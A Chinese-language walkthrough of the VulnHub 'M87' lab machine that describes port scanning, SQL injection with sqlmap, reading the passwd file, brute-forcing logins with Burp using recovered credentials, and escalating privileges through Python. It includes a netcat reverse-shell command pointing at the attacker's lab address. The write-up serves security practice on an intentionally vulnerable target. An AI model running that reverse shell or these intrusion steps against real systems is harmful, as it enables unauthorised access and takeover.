靶機介紹
官方下載下傳位址:http://www.vulnhub.com/entry/m87-1,595/
靶機難度容易,擁有兩個使用者,網絡擴充卡是NAT模式自動配置設定IP位址
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiIwczX0xiRGZkRGZ0Xy9GbvNGL2EzXlpXazxSPNpWT4hzVZ9WNXFWck1mYwh2MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL1gzN2IzMzIjM1AzMwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
運作環境
靶機:網絡設為NAT,IP位址:192.168.174.138
攻擊機:同網段下的kali linux,IP位址:192.168.174.135
開始滲透
運作靶機
靶機運作之後就提示了IP位址,端口和一個域名
掃一下端口看是否有其他存在
掃一下80端口的目錄
開始通路得到的這些目錄
80端口的首頁
admin
/admin/backup/
9090端口首頁
找到了四個登入頁面
http://192.168.174.138/admin/ 輸入參數id=’ 出現報錯 id=1的時候回顯正常 說明存在注入點
使用sqlmap跑一下,确實存在注入點
在db的資料庫的users表當中找到了使用者名密碼
經過多次嘗試這裡的使用者名密碼是無法登入任何一個登入頁面
但是資料庫存在flie權限,可以讀取檔案
檢視passwd
這裡看到确實隻存在兩個使用者
接下就不知道怎麼辦了,最後看了某一位大佬的視訊才做出來的,将所有使用者和密碼收集起來使用burp進行爆破,
最後使用charlotte:15The4Dm1n4L1f3登入9090端口的首頁
在終端選項裡面發現可以執行系統指令,接下來就是提權了,有好幾個方法可以提權
第一個方法:
執行指令反彈shell到本地 nc -e /bin/bash 192.168.174.135 4444
使用python打開一個終端
檢視old發現是python2.7可以利用os子產品調用本地的root的shell
第二個方法:
利用python相關的提權指令進行提權
也可以不反彈shell到本地直接在浏覽器執行提權指令
這個靶機到這裡就滲透結束了,難點在于擷取使用者名和密碼